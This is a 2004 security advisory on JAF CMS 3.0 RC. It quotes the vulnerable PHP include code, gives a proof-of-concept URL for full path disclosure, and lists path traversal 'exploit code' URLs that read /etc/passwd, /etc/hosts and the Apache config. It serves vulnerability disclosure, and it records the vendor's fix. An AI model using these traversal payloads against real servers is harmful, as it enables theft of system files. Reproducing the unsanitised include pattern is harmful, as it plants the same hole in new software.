` ECHO_ADV_08$2004 --------------------------------------------------------------------------- Vulnerabilities in JAF CMS --------------------------------------------------------------------------- Author: y3dips Date: November, 4th 2004 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv08-y3dips-2004.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ JAF CMS - ...just another flat file CMS, is a Content Management System (CMS) consist of a powerful set of PHP scripts that allow you to maintain personal home page. There is no need for a database. The pages stored in a simple flat file. I've coded this script because I realize that its hard to found server (especially free space) offering PHP with database support already. Created by Salim "ph03y3nk" Version affected : 3.0 Release Candidate , Not tested on 0ther Version Mail Contact : ph03y3nk@users.sourceforge.net URL: http://jaf-cms.sourceforge.net/ --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Full path disclosure: A remote user can access the file to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. See the script in config.php ---snip--- function displaycontent() { global $jaf; if(file_exists("data/".$jaf['show'])) { require_once ("data/".$jaf['show']); $filemod = filemtime("data/".$jaf['show']); $filemodtime = date("F j, Y", $filemod); echo "This page last updated on : $filemodtime"; } else { if(file_exists("news/".$jaf['show'])) { require_once ("news/".$jaf['show']); } else { echo "

Can't find the requested page, Sorry!!

"; } } } ---snip--- in that files we can see that if we supply another name of page (which is not in "data/" directory) , what we get is error message that define in the script " Can't find the requested page, Sorry!! " but what if we dont supply anything ? ,bummm ... weve got an error message that display installation path. POC : http://localhost/jaf/index.php?show= then we got an error Warning: displaycontent(data/): failed to open stream: Success in /var/www/html/jaf/config.php on line 129 Fatal error: displaycontent(): Failed opening required 'data/' (include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129 B. Path Traversal Config.php files also vulnerable against basic path traversal attack which is use "../" special character sequence to alter the resource location requested in the URL. Consequently, the results can reveal source code because the file is interpreted as text. Exploit Code : http://localhost/jaf/index.php?show=../../../../../../../etc/passwd http://localhost/jaf/index.php?show=../../../../../../../etc/hosts http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf -------------------------------------------------------------------------- The fix: ~~~~~~~~ Vendor allready contacted and allready fix it, maybe the vendor will released a new version . ------------------------- - -- --- -- - - report to vendor 4-11-2004 vendor allready fix the bug 6-11-2004 advisories released to securityfocus.com 9-11-2004 --------------------------------------------------------------------------- Disclamier: ~~~~~~~~~~~ Advice, directions, instructions and script on security vulnerabilities in this advisory for educational purpose, y3dips nor echo.or.id does not accept responsibility for any damage or injury caused as a result of its use --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff ~ yudhax, biatch-x, lieur-euy ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o & #aikmel @DALNET Greetz: ~~~~~~~ ~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- `

Query Builder